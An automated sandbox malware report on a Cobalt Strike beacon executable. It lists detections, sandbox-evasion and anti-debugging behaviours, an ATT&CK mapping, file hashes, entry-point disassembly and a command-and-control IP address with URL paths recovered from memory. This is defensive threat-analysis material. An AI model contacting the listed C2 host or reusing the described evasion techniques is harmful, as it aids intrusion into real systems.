    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
    Source: beacon_x64.exeStatic PE information: section name: .xdata
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_3_001A6060 push edi; iretd 0_3_001A6062
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_3_001A05FD pushfd ; iretd 0_3_001A05FE
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0078A86F push ebp; iretd 0_2_0078A870
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0078A84F push ebp; iretd 0_2_0078A850
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0078A898 push ebp; iretd 0_2_0078A899
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0076B91C pushad ; retf 0_2_0076B91D
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0076F901 push ebx; iretd 0_2_0076F902
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0076935D push edi; iretd 0_2_0076935E
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0076AD58 push ebp; iretd 0_2_0076AD59
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00778DC5 push FFFFFFF8h; ret 0_2_00778D74
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00778D89 push FFFFFFF8h; ret 0_2_00778D38
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0076971E push cs; retf 0_2_0076971F
    Source: C:\Users\user\Desktop\beacon_x64.exeWindow / User API: threadDelayed 1821Jump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeWindow / User API: threadDelayed 8039Jump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exe TID: 2144Thread sleep count: 1821 > 30Jump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exe TID: 2144Thread sleep time: -18210000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exe TID: 2144Thread sleep count: 8039 > 30Jump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exe TID: 2144Thread sleep time: -80390000s >= -30000sJump to behavior
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: C:\Users\user\Desktop\beacon_x64.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\beacon_x64.exeLast function: Thread delayed
    Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2993012953.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3069577014.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2982082108.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.000000000081C000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3086750899.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2910089243.0000000000892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\beacon_x64.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-16006
    Source: C:\Users\user\Desktop\beacon_x64.exeProcess Stats: CPU usage > 42% for more than 60s
    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,0_2_00401180
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A70
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_004542E4 SetUnhandledExceptionFilter,VirtualAlloc,0_2_004542E4
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00402F62 SetUnhandledExceptionFilter,0_2_00402F62

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\beacon_x64.exeNtAllocateVirtualMemory: Indirect: 0x77C294Jump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeNtProtectVirtualMemory: Indirect: 0x77C482Jump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,0_2_00401630
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00401990
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00774E28 GetUserNameA,strrchr,_snprintf,0_2_00774E28
    Source: C:\Users\user\Desktop\beacon_x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading
    1
    Process Injection
    211
    Virtualization/Sandbox Evasion
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Abuse Elevation Control Mechanism
    1
    Process Injection
    LSASS Memory21
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    1
    Abuse Elevation Control Mechanism
    Security Account Manager211
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive1
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
    Obfuscated Files or Information
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture111
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    Account Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
    System Owner/User Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync3
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    beacon_x64.exe84%ReversingLabsWin64.Backdoor.CobaltStrike
    beacon_x64.exe79%VirustotalBrowse
    beacon_x64.exe100%AviraHEUR/AGEN.1344321
    beacon_x64.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://8.148.6.140/api/v1/get=0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getSOR_A0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/get20%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/get80%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getocal0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/gety0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getem320%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getbd060%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/get40%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getue0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getL0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getJ0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getP0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/get6666u0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getstem320%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/get140/api/v1/get0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/get6666j0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getll;0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getH0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getX0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getd0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getya0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getlp0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/get#0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/get%0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getllue0%Avira URL Cloudsafe
    8.148.6.1400%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/get0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/get(0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/get&0%Avira URL Cloudsafe
    http://8.148.6.140/api/v1/getll0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    8.148.6.140true
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/gettrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://8.148.6.140/api/v1/get=beacon_x64.exe, 00000000.00000003.2910089243.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getSOR_Abeacon_x64.exe, 00000000.00000003.3459929835.0000000000857000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.000000000081C000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/get4beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/get2beacon_x64.exe, 00000000.00000003.3086750899.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getocalbeacon_x64.exe, 00000000.00000003.3459929835.0000000000857000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.000000000081C000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/get8beacon_x64.exe, 00000000.00000003.3004099013.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getybeacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getbd06beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getem32beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getuebeacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getLbeacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getJbeacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getPbeacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getstem32beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getHbeacon_x64.exe, 00000000.00000003.2910089243.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/get6666ubeacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getll;beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/get6666jbeacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/get140/api/v1/getbeacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getXbeacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://8.148.6.140/api/v1/getlbeacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      http://8.148.6.140/api/v1/getpbeacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://8.148.6.140/api/v1/getyabeacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getdbeacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/get%beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/get#beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getlluebeacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/getlpbeacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/get(beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3069577014.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://8.148.6.140/api/v1/gethbeacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://8.148.6.140/api/v1/get&beacon_x64.exe, 00000000.00000003.2993012953.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3069577014.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2982082108.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://8.148.6.140/api/v1/getllbeacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2993012953.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2982082108.0000000000892000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          8.148.6.140
          unknownSingapore
          37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1587366
          Start date and time:2025-01-10 09:24:05 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 49s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:5
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Sample name:beacon_x64.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@1/0@0/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 92%
          • Number of executed functions: 15
          • Number of non-executed functions: 53
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.12.23.50
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Report size getting too big, too many NtDeviceIoControlFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          03:24:54API Interceptor12197843x Sleep call for process: beacon_x64.exe modified
          No context
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
          • 118.178.60.103
          armv5l.elfGet hashmaliciousUnknownBrowse
          • 47.116.93.193
          3.elfGet hashmaliciousUnknownBrowse
          • 47.113.16.150
          armv7l.elfGet hashmaliciousUnknownBrowse
          • 8.181.124.11
          THsSNYblMw.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
          • 47.121.190.121
          Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
          • 139.242.78.130
          Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
          • 47.114.96.229
          Fantazy.mips.elfGet hashmaliciousUnknownBrowse
          • 8.140.140.254
          k2vUsu5VZ5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
          • 47.121.190.121
          Fantazy.spc.elfGet hashmaliciousUnknownBrowse
          • 8.167.197.133
          No context
          No context
          No created / dropped files found
          File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
          Entropy (8bit):7.45199741721171
          TrID:
          • Win64 Executable (generic) (12005/4) 74.80%
          • Generic Win/DOS Executable (2004/3) 12.49%
          • DOS Executable Generic (2002/1) 12.47%
          • VXD Driver (31/22) 0.19%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
          File name:beacon_x64.exe
          File size:328'704 bytes
          MD5:af51e1dba9c7da4626ae4aac6e61a070
          SHA1:50bc787b1122f42e10c93814a51c8eee77d8d0bc
          SHA256:fca02dc798d591881b8f1eed5049339bca51fe7f6fffbda288076518da147e1b
          SHA512:b77a28a1228f0da0d25e7344cc95a3b99b7c55db71690ada566234d4a96bcba3d51e81478ca99ea58b00295d5e4b4920674a9107735b139cd182e5cdfcfe810b
          SSDEEP:6144:38XhZ3T+WpiMi0u0idCCEU3KnoJAa+yro01nLFqn:3eZ3KD0wCCEU3Knja1X
          TLSH:DF648C974EA4C37ECD09C43DF2979E420C3A826897BDC86BEC6E8D5CD080587E5B5E16
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p................ ............................
          Icon Hash:00928e8e8686b000
          Entrypoint:0x4014c0
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
          DLL Characteristics:
          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
          TLS Callbacks:0x401ba0
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:147442e63270e287ed57d33257638324
          Instruction
          dec eax
          sub esp, 28h
          dec eax
          mov eax, dword ptr [0004EFF5h]
          mov dword ptr [eax], 00000001h
          call 00007F368C7D7E9Fh
          call 00007F368C7D768Ah
          nop
          nop
          dec eax
          add esp, 28h
          ret
          nop word ptr [eax+eax+00000000h]
          nop dword ptr [eax]
          dec eax
          sub esp, 28h
          dec eax
          mov eax, dword ptr [0004EFC5h]
          mov dword ptr [eax], 00000000h
          call 00007F368C7D7E6Fh
          call 00007F368C7D765Ah
          nop
          nop
          dec eax
          add esp, 28h
          ret
          nop word ptr [eax+eax+00000000h]
          nop dword ptr [eax]
          dec eax
          sub esp, 28h
          call 00007F368C7D9334h
          dec eax
          test eax, eax
          sete al
          movzx eax, al
          neg eax
          dec eax
          add esp, 28h
          ret
          nop
          nop
          nop
          nop
          nop
          nop
          nop
          dec eax
          lea ecx, dword ptr [00000009h]
          jmp 00007F368C7D79B9h
          nop dword ptr [eax+00h]
          ret
          nop
          nop
          nop
          nop
          nop
          nop
          nop
          nop
          nop
          nop
          nop
          nop
          nop
          nop
          nop
          dec eax
          jmp ecx
          dec eax
          arpl word ptr [00002AC2h], ax
          test eax, eax
          jle 00007F368C7D7A08h
          cmp dword ptr [00002ABBh], 00000000h
          jle 00007F368C7D79FFh
          dec eax
          mov edx, dword ptr [00052CFEh]
          dec eax
          mov dword ptr [ecx+eax], edx
          dec eax
          mov edx, dword ptr [00052CFBh]
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x540000x8d8.idata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x510000x2b8.pdata
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x500600x28.rdata
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x542240x1e8.idata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x20a80x2200ba98beafce4128c14539a20f3e854b25False0.5734145220588235data6.010394259460846IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .data0x40000x4bcf00x4be00b364a5b313a09618b8f1dd72c1bbdfa1False0.6346530065897859dBase III DBT, version number 0, next free block index 10, 1st item "\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305\262\365\205\265Y\366\205\305Y\366\205\305Y\366\205\305y\365\205\265_\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\305Y\366\205\014D?AV0\366\205GX\365\205\305I\366\205\305[\365\205\305]\366\205\305Y\366\205\305Y\366\205\305Y\366\205\345Y\366\345\014B>XVQZ\205\307"7.460821391528794IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rdata0x500000x9100xa005fcc7830b4dcd602b35eeb7f1712e8faFalse0.241796875data4.459688665734325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
          .pdata0x510000x2b80x400f88aef14dea168f37249daf0dce04c78False0.37890625data3.2311971178670404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
